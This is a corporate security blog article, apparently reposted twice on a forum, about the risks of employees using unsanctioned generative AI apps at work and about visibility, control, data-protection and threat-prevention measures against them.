Today, there are thousands of Generative AI (GenAI) tools available on the market with dozens of new AI applications being launched every month. The truth is, more than half of your employees are likely already using it to increase productivity at work, and that adoption is expected to grow as more AI apps become available for more use cases.
The problem is that most of these third-party GenAI apps have not been vetted or approved for use at work, which exposes companies to serious risks. There’s a reason IT and InfoSec teams vet and approve third-party applications being used within their company’s ecosystem of technologies – they need to understand what apps are being used, whether they are safe, and what sensitive company data, if any, is making its way into these applications. They also consider (among many other things) how the app developer handles issues, like vulnerabilities, and what controls are in place to limit or control access to only what is needed for employees to do their jobs.
The adoption of unsanctioned GenAI applications can lead to a broad range of cybersecurity issues, from data leakage to malware. That’s because your company doesn’t know who is using what apps, what sensitive information is going into them, and what’s happening to that information once it’s there. And because not all applications are built to suitable enterprise standards for security, they can also serve malicious links and act as entryways for attackers to infiltrate a company’s network, giving them access to your systems and data. All of these issues can lead to regulatory compliance violations, sensitive data exposure, IP theft, operational disruption and financial losses. While these apps provide enormous productivity potential, there are serious risks and potential consequences associated with their adoption if not done securely.
Take for example:
Marketing teams using an unsanctioned application that uses AI to generate amazing image and video content. What happens if the team loads sensitive information into the app and the details of your confidential product launch leak? Not the kind of “viral” you were looking for.
Project managers using AI-powered note-taking apps to transcribe meetings and provide useful summaries. But what happens when the notes captured include a confidential discussion about this quarter’s financial results ahead of the earnings announcement?
Developers using copilots and code optimization services to build products faster. But what if optimized code returned from a compromised application includes malicious scripts?
These are just a few of the ways that well-intentioned use of GenAI results in an unintentional increase in risk. But blocking these technologies may limit your organization’s ability to gain a competitive edge, so that isn’t the answer either. Companies can, and should, take the time to consider how they can empower their employees to use these applications securely. Here are a few considerations:
Visibility – You can’t protect what you don’t know about. One of the biggest challenges IT teams face with unsanctioned apps is that it’s difficult to respond to security incidents promptly, increasing the potential for security breaches. Every enterprise must monitor the use of third-party GenAI apps and understand the specific risks associated with each tool. Building on the understanding of which tools are being used, IT teams need visibility into what data is flowing in and out of corporate systems. This visibility will also help detect a security breach so it can be identified and rectified quickly.
Control – IT teams need the ability to make an informed decision on whether to block, allow or limit access to third-party GenAI apps, on either a per-application basis or leveraging risk-based or categorical controls. For example, you might want to block all access to code optimization tools for all employees but allow developers to access the third-party optimization tool that your information security team has assessed and sanctioned for internal use.
Data Security – Are your teams sharing sensitive data with the apps? IT teams need to block sensitive data from leaking to protect your data against misuse and theft. This is especially important if your company is regulated or subject to data sovereignty laws. In practice, this means monitoring the data being sent to GenAI apps, and then leveraging technical controls to ensure that sensitive or protected data, such as personally identifiable information or intellectual property, isn’t sent to these applications.
Threat prevention – The potential for exploits and vulnerabilities can be lurking underneath the surface of the GenAI tools being used by your teams. Given the incredibly fast rate at which many of these tools have been developed and brought to market, you often don’t know whether the model being used was built with corrupt models, trained on incorrect or malicious data, or is subject to a broad range of AI-specific vulnerabilities. It is a recommended best practice to monitor and control data flowing from the applications to your organization for malicious or suspicious activity.
While AI tools bring the incredible potential to maximize employee productivity and enable your organization to grow its top line while at the same time improving the bottom line, these tools also harbor new and more complex risks than we’ve ever seen before. It’s on business leaders and their IT teams to empower their workforce to confidently use AI tools while ensuring they are protected with awareness, visibility, controls, data protection and threat prevention. Once your security teams know what’s being used and how, they can prevent sensitive data leaks and protect against the threats lurking inside insecure or compromised AI platforms.
This article originally appeared on Forbes.
The post The Hidden AI Risk Lurking In Your Business appeared first on Palo Alto Networks Blog.
Article Link: The Hidden AI Risk Lurking In Your Business
1 post – 1 participant
Today, there are thousands of Generative AI (GenAI) tools available on the market with dozens of new AI applications being launched every month. The truth is, more than half of your employees are likely already using it to increase productivity at work, and that adoption is expected to grow as more AI apps become available for more use cases.
The problem is that most of these third-party GenAI apps have not been vetted or approved for use at work, which exposes companies to serious risks. There’s a reason IT and InfoSec teams vet and approve third-party applications being used within their company’s ecosystem of technologies – they need to understand what apps are being used, whether they are safe, and what sensitive company data, if any, is making its way into these applications. They also consider (among many other things) how the app developer handles issues, like vulnerabilities, and what controls are in place to limit or control access to only what is needed for employees to do their jobs.
The adoption of unsanctioned GenAI applications can lead to a broad range of cybersecurity issues, from data leakage to malware. That’s because your company doesn’t know who is using what apps, what sensitive information is going into them, and what’s happening to that information once it’s there. And because not all applications are built to suitable enterprise standards for security, they can also serve malicious links and act as entryways for attackers to infiltrate a company’s network, giving them access to your systems and data. All of these issues can lead to regulatory compliance violations, sensitive data exposure, IP theft, operational disruption and financial losses. While these apps provide enormous productivity potential, there are serious risks and potential consequences associated with their adoption if not done securely.
Take for example:
Marketing teams using an unsanctioned application that uses AI to generate amazing image and video content. What happens if the team loads sensitive information into the app and the details of your confidential product launch leak? Not the kind of “viral” you were looking for.
Project managers using AI-powered note-taking apps to transcribe meetings and provide useful summaries. But what happens when the notes captured include a confidential discussion about this quarter’s financial results ahead of the earnings announcement?
Developers using copilots and code optimization services to build products faster. But what if optimized code returned from a compromised application includes malicious scripts?
These are just a few of the ways that well-intentioned use of GenAI results in an unintentional increase in risk. But blocking these technologies may limit your organization’s ability to gain a competitive edge, so that isn’t the answer either. Companies can, and should, take the time to consider how they can empower their employees to use these applications securely. Here are a few considerations:
Visibility – You can’t protect what you don’t know about. One of the biggest challenges IT teams face with unsanctioned apps is that it’s difficult to respond to security incidents promptly, increasing the potential for security breaches. Every enterprise must monitor the use of third-party GenAI apps and understand the specific risks associated with each tool. Building on the understanding of which tools are being used, IT teams need visibility into what data is flowing in and out of corporate systems. This visibility will also help detect a security breach so it can be identified and rectified quickly.
Control – IT teams need the ability to make an informed decision on whether to block, allow or limit access to third-party GenAI apps, on either a per-application basis or leveraging risk-based or categorical controls. For example, you might want to block all access to code optimization tools for all employees but allow developers to access the third-party optimization tool that your information security team has assessed and sanctioned for internal use.
Data Security – Are your teams sharing sensitive data with the apps? IT teams need to block sensitive data from leaking to protect your data against misuse and theft. This is especially important if your company is regulated or subject to data sovereignty laws. In practice, this means monitoring the data being sent to GenAI apps, and then leveraging technical controls to ensure that sensitive or protected data, such as personally identifiable information or intellectual property, isn’t sent to these applications.
Threat prevention – The potential for exploits and vulnerabilities can be lurking underneath the surface of the GenAI tools being used by your teams. Given the incredibly fast rate at which many of these tools have been developed and brought to market, you often don’t know whether the model being used was built with corrupt models, trained on incorrect or malicious data, or is subject to a broad range of AI-specific vulnerabilities. It is a recommended best practice to monitor and control data flowing from the applications to your organization for malicious or suspicious activity.
While AI tools bring the incredible potential to maximize employee productivity and enable your organization to grow its top line while at the same time improving the bottom line, these tools also harbor new and more complex risks than we’ve ever seen before. It’s on business leaders and their IT teams to empower their workforce to confidently use AI tools while ensuring they are protected with awareness, visibility, controls, data protection and threat prevention. Once your security teams know what’s being used and how, they can prevent sensitive data leaks and protect against the threats lurking inside insecure or compromised AI platforms.
This article originally appeared on Forbes.
The post The Hidden AI Risk Lurking In Your Business appeared first on Palo Alto Networks Blog.
Article Link: The Hidden AI Risk Lurking In Your Business
1 post – 1 participant
Read full topic